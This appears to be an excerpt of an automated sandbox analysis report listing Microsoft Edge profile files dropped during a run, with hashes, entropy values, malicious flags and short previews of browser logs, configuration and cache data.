SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.239807198954376
Encrypted:	false
SSDEEP:	6:HUtStBQd3+q2P923oH+Tcwt8aPrqIFUt8YUt7fZmw+YUt7fVkwO923oH+Tcwt8a4:DmdOv4YebL3FUt83/+l5LYebQJ
MD5:	8FF8FA2CA4D4EB4C665859D8FC6D0270
SHA1:	6B6DD5CC847B2627CE3CC877310A2B465103AC54
SHA-256:	B3BDFFD329690B011A48BE71875F7C1188967634A2C0434AFAEF9CF47EE56D53
SHA-512:	E1DE8E719AE85476E9817954F99C91AB3FE3B1C6E7C4FB29B592F6804B5D8A816EF2356FCB595144C5E7C16065B18CF1F001DDDB8D76AFCBF69FA1FC7101FCEF
Malicious:	false
Preview:	2024/11/13-14:39:36.769 1d58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/13-14:39:36.770 1d58 Recovering log #3.2024/11/13-14:39:36.770 1d58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.239807198954376
Encrypted:	false
SSDEEP:	6:HUtStBQd3+q2P923oH+Tcwt8aPrqIFUt8YUt7fZmw+YUt7fVkwO923oH+Tcwt8a4:DmdOv4YebL3FUt83/+l5LYebQJ
MD5:	8FF8FA2CA4D4EB4C665859D8FC6D0270
SHA1:	6B6DD5CC847B2627CE3CC877310A2B465103AC54
SHA-256:	B3BDFFD329690B011A48BE71875F7C1188967634A2C0434AFAEF9CF47EE56D53
SHA-512:	E1DE8E719AE85476E9817954F99C91AB3FE3B1C6E7C4FB29B592F6804B5D8A816EF2356FCB595144C5E7C16065B18CF1F001DDDB8D76AFCBF69FA1FC7101FCEF
Malicious:	false
Preview:	2024/11/13-14:39:36.769 1d58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2024/11/13-14:39:36.770 1d58 Recovering log #3.2024/11/13-14:39:36.770 1d58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	418
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
MD5:	BF097D724FDF1FCA9CF3532E86B54696
SHA1:	4039A5DD607F9FB14018185F707944FE7BA25EF7
SHA-256:	1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
SHA-512:	31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.256636127054158
Encrypted:	false
SSDEEP:	6:HUtJ+q2P923oH+Tcwt865IFUt8YUtbZmw+YUteV3VkwO923oH+Tcwt86+ULJ:Hv4Yeb/WFUt8v/+S5LYeb/+SJ
MD5:	70A5D7342DBB60FABEA730BAD3CF605C
SHA1:	014585465C355FDE485B86CD17DD662EC7E4290A
SHA-256:	239D7E9BEB6CC647E0FC7E0052CDBF382EDBAD1A3A3663F1A8ECDBD9099611C4
SHA-512:	9123379AADE50381A4C5D7B521DE9CA28868CA4F011E82E4272BA531D3B61D380B0BFDD33DAF58A1B4A93F0D25E22D30F5D41EC0BC4621D5A2E89B48B0A97748
Malicious:	false
Preview:	2024/11/13-14:39:36.794 1d58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/13-14:39:36.796 1d58 Recovering log #3.2024/11/13-14:39:36.799 1d58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	328
Entropy (8bit):	5.256636127054158
Encrypted:	false
SSDEEP:	6:HUtJ+q2P923oH+Tcwt865IFUt8YUtbZmw+YUteV3VkwO923oH+Tcwt86+ULJ:Hv4Yeb/WFUt8v/+S5LYeb/+SJ
MD5:	70A5D7342DBB60FABEA730BAD3CF605C
SHA1:	014585465C355FDE485B86CD17DD662EC7E4290A
SHA-256:	239D7E9BEB6CC647E0FC7E0052CDBF382EDBAD1A3A3663F1A8ECDBD9099611C4
SHA-512:	9123379AADE50381A4C5D7B521DE9CA28868CA4F011E82E4272BA531D3B61D380B0BFDD33DAF58A1B4A93F0D25E22D30F5D41EC0BC4621D5A2E89B48B0A97748
Malicious:	false
Preview:	2024/11/13-14:39:36.794 1d58 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2024/11/13-14:39:36.796 1d58 Recovering log #3.2024/11/13-14:39:36.799 1d58 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1254
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
MD5:	826B4C0003ABB7604485322423C5212A
SHA1:	6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
SHA-256:	C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
SHA-512:	0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.196808273443872
Encrypted:	false
SSDEEP:	6:HUtK39+q2P923oH+Tcwt8NIFUt8YUtK3JZmw+YUt339VkwO923oH+Tcwt8+eLJ:9N+v4YebpFUt8uZ/+5V5LYebqJ
MD5:	DC36243851BFEA94803E0BB19D8377C2
SHA1:	9D41E15239CDA0B6AA09FDC33CFCA2942E569502
SHA-256:	B90E4B3A7DDE6DC2869FF368338B13928F4E632AD045AF5AB013B119ADA1FDD3
SHA-512:	650574818734D025207E7044F378FE2FE4DC70944C5FAE6F75F30443D2C5CECB3199F1347AAD09D2D308804639CB750B901282F9A8864BEDAC785544074FB19E
Malicious:	false
Preview:	2024/11/13-14:39:37.541 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/13-14:39:37.541 1dbc Recovering log #3.2024/11/13-14:39:37.542 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	324
Entropy (8bit):	5.196808273443872
Encrypted:	false
SSDEEP:	6:HUtK39+q2P923oH+Tcwt8NIFUt8YUtK3JZmw+YUt339VkwO923oH+Tcwt8+eLJ:9N+v4YebpFUt8uZ/+5V5LYebqJ
MD5:	DC36243851BFEA94803E0BB19D8377C2
SHA1:	9D41E15239CDA0B6AA09FDC33CFCA2942E569502
SHA-256:	B90E4B3A7DDE6DC2869FF368338B13928F4E632AD045AF5AB013B119ADA1FDD3
SHA-512:	650574818734D025207E7044F378FE2FE4DC70944C5FAE6F75F30443D2C5CECB3199F1347AAD09D2D308804639CB750B901282F9A8864BEDAC785544074FB19E
Malicious:	false
Preview:	2024/11/13-14:39:37.541 1dbc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2024/11/13-14:39:37.541 1dbc Recovering log #3.2024/11/13-14:39:37.542 1dbc Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	429
Entropy (8bit):	5.809210454117189
Encrypted:	false
SSDEEP:	6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
MD5:	5D1D9020CCEFD76CA661902E0C229087
SHA1:	DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
SHA-256:	B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
SHA-512:	5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0018164538716206493
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zEZlPPt/:/M/xT02zKPt/
MD5:	F599428C167C82C2E02823B54762FFF5
SHA1:	0DD967D32CF883FCE2F6B21DE53E0513D188B8D2
SHA-256:	5F4BABC2B5E167C1D72882932A10F2C9429D179CF602D7948CD1339854EB4178
SHA-512:	5435F620E583BEEBA156D070661D6C2FD3D3C27A6DCD973D5EED2E2218BC228C44340364A0C9214B88140D56BD3196595AF2A795883BDADAD420D8C619ABC45F
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	8720
Entropy (8bit):	0.2191763562065486
Encrypted:	false
SSDEEP:	3:I2ZtFlljq7A/mhWJFuQ3yy7IOWU8QQdweytllrE9SFcTp4AGbNCV9RUIjxw:I2C75fOBQd0Xi99pEY5xw
MD5:	5649EA98162868FC83472BD2F4E1F4F3
SHA1:	1F04B4560C6EFDF6091722AABC07B967E1CC4AA8
SHA-256:	E77C2E4103F01650996E3D9351389364B2307CDBD3592B72930A3ACDF2FC5E1B
SHA-512:	A55F0808F2959728561AD18C1087331C25F0A4BADDDCB8B426D3FAEEEB56A13227CCF5E8C4599450B3EC0AB87A144D3293CACF853BC288AD8CD28A2912B3B5D8
Malicious:	false
Preview:	..................&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (1597), with CRLF line terminators
Category:	dropped
Size (bytes):	115717
Entropy (8bit):	5.183660917461099
Encrypted:	false
SSDEEP:	1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
MD5:	3D8183370B5E2A9D11D43EBEF474B305
SHA1:	155AB0A46E019E834FA556F3D818399BFF02162B
SHA-256:	6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
SHA-512:	B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
Malicious:	false
Preview:	{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs\|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs\|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 11, cookie 0x3, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	45056
Entropy (8bit):	3.918414601255008
Encrypted:	false
SSDEEP:	384:jj9P0PQkQerkjly773pLDcIgam6IkP/Kbt/RKToaADhf:jdUe2mly7O/UP/iRKc39
MD5:	5AB92321902A0ABFA27D09411BAC43DB
SHA1:	26F9287A309CEC9D52CF6BA78E1EC8A2CAC71DB6
SHA-256:	EE4D9D5BBE4C844F47CCFE3909E15AE2FC4FAC945DC279969F93CF94ACA58C95
SHA-512:	971AFC8CD4F487D0FA8C4B0318C4443192B6FFE7EE2E51B204F3D66A6212746436DDCD00B22F116741EED02FFF4D99BD1D349B37C8F70687E791DE9E1CAF2E80
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...:.8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.258557310419668
Encrypted:	false
SSDEEP:	12:n1yv4Yeb8rcHEZrELFUt8eJ/+e1R5LYeb8rcHEZrEZSJ:n1Y4Yeb8nZrExg8ed1DLYeb8nZrEZe
MD5:	E98A2BFDB9AE62876F83E80FF36F9DC9
SHA1:	0FEE7A7D9B69BCEB2076D1A2D916EE6551C83865
SHA-256:	25DBE77F665DCB0BCAB3A7D31F98B15ADAA9D690C32616FAF33D0E9E4035A7E8
SHA-512:	DA3A04EB7411080EC1B8AAC97118762BF1BDEBBD8DDC7F95F5DD600FB0D9EB75CEC1FAAD680E9CF4EAA3B12CB76E09EB1F1AB2B503844F4C8DACB41E75D8CF1C
Malicious:	false
Preview:	2024/11/13-14:39:40.375 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/13-14:39:40.375 1e34 Recovering log #3.2024/11/13-14:39:40.375 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	408
Entropy (8bit):	5.258557310419668
Encrypted:	false
SSDEEP:	12:n1yv4Yeb8rcHEZrELFUt8eJ/+e1R5LYeb8rcHEZrEZSJ:n1Y4Yeb8nZrExg8ed1DLYeb8nZrEZe
MD5:	E98A2BFDB9AE62876F83E80FF36F9DC9
SHA1:	0FEE7A7D9B69BCEB2076D1A2D916EE6551C83865
SHA-256:	25DBE77F665DCB0BCAB3A7D31F98B15ADAA9D690C32616FAF33D0E9E4035A7E8
SHA-512:	DA3A04EB7411080EC1B8AAC97118762BF1BDEBBD8DDC7F95F5DD600FB0D9EB75CEC1FAAD680E9CF4EAA3B12CB76E09EB1F1AB2B503844F4C8DACB41E75D8CF1C
Malicious:	false
Preview:	2024/11/13-14:39:40.375 1e34 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/MANIFEST-000001.2024/11/13-14:39:40.375 1e34 Recovering log #3.2024/11/13-14:39:40.375 1e34 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Extension Settings\jdiccldimpdaibmpdkjnbmckianbfold/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	CLIPPER COFF executable (VAX #) not stripped - version 21061
Category:	dropped
Size (bytes):	1656
Entropy (8bit):	5.688711749759559
Encrypted:	false
SSDEEP:	48:dZtE+tiXZU9V03Sx4xyBtx7wzuGHHHxda2LoEJ:dIR6NQJRxLn
MD5:	8E5958D0F708F45679E4A2C991FC5D24
SHA1:	E97407CCF6B37E2B4EF1ABEE7CDABD8D7BC72370
SHA-256:	098629EBD47F21179E816A8071E998EEAE9E6258301AA99C49A325BD1D74C20E
SHA-512:	27E8A99A4EC86B1BFD543500420188EB77D21498F57A73FE336ADE318382698410E2806AEC69115801032C290B40CC80AF172202725D458B1345D514C13B3279
Malicious:	false
Preview:	}..F.................VERSION.1..META:https://ntp.msn.com............!_https://ntp.msn.com..LastKnownPV..1731526789349.-_https://ntp.msn.com..LastVisuallyReadyMarker..1731526790923.._https://ntp.msn.com..MUID!.25B04BE6D989657B07C35ED0D82864B0.._https://ntp.msn.com..bkgdV...{"cachedVideoId":-1,"lastUpdatedTime":1731526789421,"schedule":[29,16,9,-1,-1,-1,-1],"scheduleFixed":[29,16,9,-1,-1,-1,-1],"simpleSchedule":[24,31,44,47,52,48,42]}.%_https://ntp.msn.com..clean_meta_flag..1.5_https://ntp.msn.com..enableUndersideAutoOpenFromEdge..false.7_https://ntp.msn.com..nurturing_interaction_trace_ls_id..1731526789307.&_https://ntp.msn.com..oneSvcUniTunMode..header."_https://ntp.msn.com..pageVersions..{"dhp":"20241113.242"}.*_https://ntp.msn.com..pivotSelectionSource..sticky.#_https://ntp.msn.com..selectedPivot..myFeed.5_https://ntp.msn.com..ssrBasePageCachingFeatureActive..true.#_https://ntp.msn.com..switchedPivot..myFeed.O_https://ntp.msn.com..Wed Nov 13 2024 14:39:49 GMT-0500 (Eastern Standard

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.192429899963573
Encrypted:	false
SSDEEP:	6:HUtaq2P923oH+Tcwt8a2jMGIFUt8YUty9Zmw+YUtVkwO923oH+Tcwt8a2jMmLJ:Bv4Yeb8EFUt8W/+p5LYeb8bJ
MD5:	873BB47E858FDC1BF082E2AD73BAA469
SHA1:	5AD4A8DE88FB8A382983C122D43C545617FC2E00
SHA-256:	889B1FC5426F6343D42EA5EEBD322794B21CFA797C8EAE3A61C47A90F832D761
SHA-512:	2ADF2177ADA55EB3B476D74BE0089BA180F64AC02E106FAAAC9A3D4F3C0ADB85E012F234F1041F65D4510290AC70274C20EE4993105D3E6F7A6F121932FF2589
Malicious:	false
Preview:	2024/11/13-14:39:37.081 1c64 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/13-14:39:37.082 1c64 Recovering log #3.2024/11/13-14:39:37.085 1c64 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	336
Entropy (8bit):	5.192429899963573
Encrypted:	false
SSDEEP:	6:HUtaq2P923oH+Tcwt8a2jMGIFUt8YUty9Zmw+YUtVkwO923oH+Tcwt8a2jMmLJ:Bv4Yeb8EFUt8W/+p5LYeb8bJ
MD5:	873BB47E858FDC1BF082E2AD73BAA469
SHA1:	5AD4A8DE88FB8A382983C122D43C545617FC2E00
SHA-256:	889B1FC5426F6343D42EA5EEBD322794B21CFA797C8EAE3A61C47A90F832D761
SHA-512:	2ADF2177ADA55EB3B476D74BE0089BA180F64AC02E106FAAAC9A3D4F3C0ADB85E012F234F1041F65D4510290AC70274C20EE4993105D3E6F7A6F121932FF2589
Malicious:	false
Preview:	2024/11/13-14:39:37.081 1c64 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/13-14:39:37.082 1c64 Recovering log #3.2024/11/13-14:39:37.085 1c64 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\00792fdf-fa7a-4b0a-ba1e-ddee657d838f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0fa356e3-c67c-43e4-b3d0-967340af0acd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\87b8a9cc-33c9-40b9-8f81-69cb7fa95b87.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.3960334474584686
Encrypted:	false
SSDEEP:	96:ige+AZhjGJXPYkm3L6/6RcPqD/TnVFUKU5a7Bh6EqB30cLGY:igijGXPYkKL6Qj/TnzUHgK90cL5
MD5:	58A1432BF24F5E39C249B71C4AF58BC9
SHA1:	FE39EA7FCCCE3D8CBA1362BDB44C6B99D904B1BC
SHA-256:	067BAEFA03F1FE65185A5177FF8A01C0A95ADFDCD02930BE21C13C2B2549548D
SHA-512:	89A5EDCD059C545EEE32C5DF9E38333226F5C929ADC9DBDAB415692DEF5B1D65981E76D43148AF4E6D640F24B226E953A4788A6FEC6E8FDFF6667196E2CF2342
Malicious:	true
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1419
Entropy (8bit):	5.336394944460292
Encrypted:	false
SSDEEP:	24:YXsJZVMdmRdsBjZFRudFGRw6ma3yeesRds1yZFGJ/I3w6C1E6maPsQYhbxP7nbI+:YXs/tsbfc7leeEscgCgakhYhbxo+
MD5:	BF6BA1797785A5763A0088569A24FE85
SHA1:	62B9D7386B7BDD97B816063ED0D9CC0D912EB130
SHA-256:	40C6B39ED9B1E473CBD7027290D7996D15139F0B5BDC4BA6769E8FE8467BBA4E
SHA-512:	FE46026F5F2C16522DBA26D256C0831DA94254C432E5C2CC77F864E6D7E0F1D9C66A50726AF91B06D54EC124C21D1C73744CB2D9CC016BD9FE7200823698D729
Malicious:	false
